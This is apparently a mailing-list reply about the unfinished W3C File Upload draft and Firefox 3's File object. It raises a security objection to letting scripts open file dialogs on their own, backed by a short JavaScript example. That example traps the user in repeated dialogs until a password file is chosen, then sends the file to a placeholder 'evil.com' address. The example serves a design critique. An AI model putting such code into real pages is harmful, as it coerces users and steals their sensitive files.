Garrett Smith wrote:
The File object is useful for uploading files via XHR. It provides
functionality for data to be retrieved from a file submitted to a
formusing the input type "file".
It is currently a Working Draft:
http://www.w3.org/TR/file-upload/
http://dev.w3.org/2006/webapi/FileUpload/publish/FileUpload.html
Implemented differently in Firefox 3.
http://developer.mozilla.org/en/docs/nsIDOMFile
https://bugzilla.mozilla.org/show_bug.cgi?id=371432
An example in Firefox 3:
http://dhtmlkitchen.com/ape/example/form/Form.html
It is a useful feature for in-page file upload, without resorting
toIFRAME hackery.
What is the status of File Upload?
Firefox 3's implementation is different than the w3c working draft.The
spec author seems to have abandoned that, so now there's a working
draft which seems to be collecting dust for a couple of years.
What is going on with File Upload specification? It would be a useful
feature, but with only a half-legged attempt at a spec that the author
abandoned, and a different implementation in Firefox 3, other browsers
probably won't implement this functionality any time soon. It's useful
in Firefox 3, and would be even better if there were some mime-type
sniffing (mediaType).
There seems to be a need for failing test cases,, so implementations
can fill in the "???"'s. Any other suggestions for getting this thing
done?
The spec only really supplies one feature over what Firefox 3 has: The
ability to open a file dialog strictly from Javascript without any UI
objects involved.
I'm not sure if this is a super desirable feature from a security point
of view. Technically speaking a site could take a users browser hostage
unless the user agrees to give up a sensitive file:
function checkForFile(e) {
if (!e || !fileIsPasswordFile(e.fileList[0])) {
alert("Give me your passw0rd file!");
var fd = new FileDialog();
fd.addEventListenerNS(
"http://www.w3.org/ns/fs-event#";, "files-selected", checkForFile,
false);
fd.open();
}
else {
xhr = new XMLHttpRequest();
xhr.open("GET", "http://evil.com/passwordsaver.cgi";, false);
xhr.send(e.fileList[0]);
}
}
checkForFile();
Granted, there are certainly many ways to DoS a browser already
(while(1) alert('ha');) but the above is somewhat more sinister.
/ Jonas
